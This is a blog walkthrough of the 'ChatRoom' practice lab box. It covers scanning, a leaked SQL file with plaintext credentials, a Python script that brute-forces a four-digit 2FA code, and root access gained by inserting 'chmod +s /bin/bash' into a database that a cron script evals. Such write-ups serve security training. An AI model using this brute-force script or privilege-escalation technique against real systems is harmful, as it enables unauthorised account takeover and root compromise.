ChatRoom pg walkthrough Intermediate

Posted by WSssSW on 2024-11-30
NMAP
┌──(root㉿kali)-[~/lab]
└─# nmap -p- -A 192.168.189.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 00:22 UTC
Nmap scan report for 192.168.189.110
Host is up (0.073s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_  256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Chat Room
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%), Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3.13 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 4.15 - 5.8 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%), Crestron XPanel control system (86%), Linux 3.13 (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   72.32 ms 192.168.45.1
2   72.15 ms 192.168.45.254
3   73.03 ms 192.168.251.1
4   76.67 ms 192.168.189.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.45 seconds

Only 22 and 80 are open, so port 80 has to be the way in. Browsing to it shows a login page; admin/admin does not get us in. ![image](https://img2024.cnblogs.com/blog/3376478/202411/3376478-20241130082639392-1511921679.png)
dirsearch
[00:25:08] Starting: 
[00:25:16] 403 -  280B  - /.htaccess.bak1                                   
[00:25:16] 403 -  280B  - /.ht_wsr.txt                                      
[00:25:16] 403 -  280B  - /.htaccess.save                                   
[00:25:16] 403 -  280B  - /.htaccess.orig
[00:25:16] 403 -  280B  - /.htaccess.sample
[00:25:16] 403 -  280B  - /.htaccess_sc
[00:25:16] 403 -  280B  - /.htaccess_orig
[00:25:16] 403 -  280B  - /.htaccessBAK                                     
[00:25:16] 403 -  280B  - /.htaccessOLD2                                    
[00:25:16] 403 -  280B  - /.htaccess_extra                                  
[00:25:16] 403 -  280B  - /.htaccessOLD
[00:25:16] 403 -  280B  - /.htm
[00:25:16] 403 -  280B  - /.htpasswd_test                                   
[00:25:16] 403 -  280B  - /.htpasswds
[00:25:16] 403 -  280B  - /.html                                            
[00:25:16] 403 -  280B  - /.httr-oauth                                      
[00:25:17] 403 -  280B  - /.php                                             
[00:25:19] 301 -  315B  - /js  ->  http://192.168.189.110/js/               
[00:25:23] 302 -    0B  - /admin.php  ->  index.php                         
[00:25:34] 302 -    0B  - /chat.php  ->  index.php                          
[00:25:36] 301 -  316B  - /css  ->  http://192.168.189.110/css/             
[00:25:43] 301 -  319B  - /images  ->  http://192.168.189.110/images/       
[00:25:43] 200 -  457B  - /images/                                          
[00:25:45] 200 -  511B  - /js/                                              
[00:25:47] 302 -    0B  - /login.php  ->  index.php                         
[00:26:00] 403 -  280B  - /server-status                                    
[00:26:00] 403 -  280B  - /server-status/
[00:26:00] 200 -    2KB - /setup.sql               

dirsearch turned up a very interesting file: setup.sql

Reading it gives us the whole schema plus a batch of usernames and passwords stored in plaintext. Note the hooks table as well: it stores a command string (seeded with 'touch timestamp.txt'), which matters later.
CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT UNIQUE NOT NULL,
    password TEXT NOT NULL,
    is_admin INTEGER NOT NULL
);

CREATE TABLE password_resets (
    id INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL,
    token TEXT NOT NULL,
    FOREIGN KEY(user_id) REFERENCES users(id)
);

CREATE TABLE two_factor_tokens (
    id INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL,
    token TEXT NOT NULL,
    FOREIGN KEY(user_id) REFERENCES users(id)
);

CREATE TABLE comments (
    id INTEGER PRIMARY KEY,
    user TEXT NOT NULL,
    text TEXT NOT NULL,
    is_admin INTEGER NOT NULL
);

CREATE TABLE hooks (
    id INTEGER PRIMARY KEY,
    code TEXT,
    backup BOOLEAN NOT NULL DEFAULT 0
);

INSERT INTO users (username, password, is_admin) VALUES
('mrjones', 'L1k3ARo11!ngSt0ne', 0),
('louise', 'T@mb0ur1neMan1965', 0),
('johanna', 'H0wD0es1tFeel?', 0),
('ramona', 'T1mes@reCh@ng1ng', 0),
('maggie', 'L@yin+heW1nd$1963', 0),
('adm_robertz', 'J0k3r$Th1ef&Qeen', 1);

INSERT INTO comments (user, text, is_admin) VALUES
('mrjones', 'Hello everyone! Excited to be here.', 0),
('louise', 'Welcome, mrjones! This is a great place to learn.', 0),
('johanna', 'Does anyone know how to reset the password?', 0),
('ramona', 'Yes, johanna, you can go to the "Forgot Password" link on the login page.', 0),
('adm_robertz', 'Remember to follow the community guidelines. Happy chatting!', 1),
('maggie', 'Thanks for the reminder, adm_robertz!', 0),
('johanna', 'Got it, thanks ramona!', 0),
('louise', 'If anyone needs help, feel free to ask.', 0),
('mrjones', 'What are some good resources to start with?', 0);

INSERT INTO hooks (id, code, backup) VALUES (1, 'touch timestamp.txt', 0);

Tried the credentials straight against SSH with hydra: none of them work.

So log in to the web app instead. ('adm_robertz', 'J0k3r$Th1ef&Qeen', 1) is the only row with is_admin = 1, so that user should be the admin; try it first.

Damn, there is a second factor as well.

Ignore it for now and first check whether the pages dirsearch found (admin.php, chat.php) are reachable once only the password step is done. They are.

There is something very interesting in there: chat hooks, presumably commands that fire when something is posted in the chat. But the same problem comes back: without the 2FA code we cannot fully log in, so we cannot trigger them.

One more interesting spot: entering a username in the Forgot Password form returns a token. It turned out not to be useful here.

The verification code is only four digits, so brute-forcing it is the simplest option: 9000 candidates (1000 to 9999), sent with the session cookie that already passed the password check, looking for the one response that redirects (302) instead of re-rendering the form. Quick and dirty script:
import requests

# Brute-force the 4-digit 2FA code for a session that has already passed
# the password check for adm_robertz. PHPSESSID is that session's cookie.
cookies = {
    'PHPSESSID': 'jdcg3a4b8335ms7jkrqsm517i9',
}

headers = {
    'Host': '192.168.189.110',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://192.168.189.110',
    'Connection': 'close',
    'Referer': 'http://192.168.189.110/2fa.php',
    'Upgrade-Insecure-Requests': '1',
}

# Codes 1000-9999; widen to range(0, 10000) with f'{code:04d}' if the app
# accepts codes with leading zeros.
for code in range(1000, 10000):
    data = {'2fa_code': str(code)}
    # allow_redirects=False so the 302 issued for the correct code is visible
    # instead of being followed to the chat page.
    response = requests.post('http://192.168.189.110/2fa.php', cookies=cookies,
                             headers=headers, data=data, allow_redirects=False)
    print(code, response.status_code)
    if response.status_code == 302:
        print("code :::::::", code)
        break

Logged in.

Then we trigger the hooks and get a reverse shell back.

On the box there is a user dylan, and an SSH private key for that user lies around; we use it to SSH in as dylan.

Looking at the scheduled tasks turns up a suspicious one. Its code:
dylan@chatroom:/tmp$ cat /var/backups/backup.sh 
#!/bin/bash
BACKUP_SCRIPT="/var/backups/backup.sh"
CRON_FILE="/etc/cron.d/backup_cron"
BACKUP_DIR="/var/backups"
w="/var/www/html"
b="/var/backups"
mkdir -p $b
cp $w/chatroom.db $b/b.db

eQ="U0VMRUNUIGNvZGUgRlJPTSBob29rcyBXSEVSRSBiYWNrdXAgPSAxIEFORCAoaWQgSVMgTk9UIE5VTEwpIE9SREVSIEJZIGlkIERFU0MgTElNSVQgMTs="
c=$(echo "$eQ" | base64 --decode | sqlite3 $b/b.db)
ip4='\b((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\b'
ip6='\b([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b|\b([0-9a-fA-F]{1,4}:){1,7}:|\b:([0-9a-fA-F]{1,4}:){1,6}[0-9a-fA-F]{1,4}\b'
echo "$c" | grep -qE "$ip4|$ip6" || eval "$c"

Base64-decode the query to see what it does:

SELECT code FROM hooks WHERE backup = 1 AND (id IS NOT NULL) ORDER BY id DESC LIMIT 1;

Running it against the database returns nothing: the only seeded hook has backup = 0, so no row matches.

The last line of the script also shows that whatever this query returns is handed straight to eval, with a single guard: the output is grepped for an IPv4 or IPv6 literal, and eval runs only when none is found. So the newest hook with backup = 1 gets executed by the cron job, as long as its command contains no IP address.

Tried inserting a malicious row into b.db, but that file is not writable for us.

Looking at the script again, b.db is just a copy of /var/www/html/chatroom.db taken on every run. That makes it easy, because we do have write access to /var/www/html/chatroom.db.

Insert the malicious command (no IP address in it, so the grep guard does not trip):
echo "insert into hooks ('code','backup') values('chmod +s /bin/bash',1)" | sqlite3 /var/www/html/chatroom.db

Wait for the cron job to run; afterwards /bin/bash carries the setuid bit, and running it as bash -p (so it keeps the effective uid) gives a root shell.

Privilege escalation done.
